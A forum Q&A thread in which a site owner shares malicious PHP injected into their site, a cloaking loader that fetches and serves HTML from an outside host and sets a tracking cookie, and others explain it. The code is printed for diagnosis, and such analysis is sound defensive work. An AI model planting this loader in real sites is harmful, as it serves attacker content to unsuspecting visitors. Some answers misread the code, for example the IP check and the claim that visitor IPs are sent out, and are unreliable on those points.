I was just hacked, but I don't know how or more importantly, why. Very odd code injected

Question

EDIT: Good work all so far.

I've just found this being download and ran in my bash history:

http://notsoft.ru/glib

(safe to view)

Thanks all

---

I've just noticed the source php of my site has been edited. I've no idea how (I've changed all my passwords since) but what's really confuses me is why.

In a couple of pages there was a iframe placed, linking to an xml.php file which was placed in my images directory (the only directory accessible by HTACCESS. This code MUST have been hand placed as the pages are fairly complex and to auto place without braking these pages would have been near impossible.

Now the REALLY confusing thing is the contents of this XML.php file, as from what I can see it does nothing.

Here's the code:

<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>

Am I missing something, or is this the strangest "hack" ever?? I've done my googling and can't find any reference to it happening before.

Answer 1

Right what it does is as follows.

1. Checks to see if the script was called with ping if it was it replies and terminates
2. Downloads a list of valid server IPs and checks that the request came from one, terminates if not.
3. Downloads a list of user-agent strings and matches the browser against those to see if it is valid, if not it terminates.
4. If the cookie pingshell has been set previously then the HTML file is downloaded and displayed to the browser
5. Otherwise a cookie script is sent back to the browser, setting the pingshell cookie to a dummy value, valid for the entire domain.

Step 4 is the important bit, it looks like a proxy server to retrieve the HTML at the location given. If the link is illegal, then it's not good. Probably for marketing purposes though, they can use your URL to serve their content and get your users click-through data.

Having said that the code only allows any form of access from prescribed IP addresses, so unless they are capturing that information first, seems like it is designed for specific use by specific people.

Answer 2

Make sure you have safe mode enabled in your php.ini to avoid such scripts opening remote unsafe files..

Answer 3

Looks like part of an automated script. This would be used to confirm that the auto-attack was successful, and to rank up a big list of places to return to. Among other things. (Jonah Bron brings up some other things)

EDIT

What you can do is gut the code and monitor calls to the file in a log. See what someone tries to do with it.

Answer 4

Looks like they want to use your site to broaden their cookie tracking system. The Status: ping successful thing looks like a function for them to check the integrity of their hack periodically. It also sends the IP addresses of all of your visitors to their server.